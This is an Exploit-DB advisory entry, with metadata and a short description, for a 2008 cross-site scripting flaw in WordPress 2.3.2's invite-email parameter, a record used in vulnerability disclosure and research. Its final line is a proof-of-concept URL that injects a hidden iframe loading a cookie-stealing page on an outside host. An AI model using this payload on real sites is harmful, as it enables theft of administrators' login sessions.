WordPress Core 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting

Author: Doz
type: webapps
platform: php
port: 
date_added: 2008-03-07  
date_updated: 2017-05-04  
verified: 1  
codes: CVE-2008-1304;OSVDB-43402  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comWordPress-2.3.2.zip  

raw file: 31356.txt  
source: https://www.securityfocus.com/bid/28139/info

WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

WordPress 2.3.2 is vulnerable; other versions may also be affected.

http://www.example.com/wp-admin/users.php?update=invite&inviteemail=>< iframe src=http://members.lycos.co.uk/Account/CookieMonster.php width=0 height=0>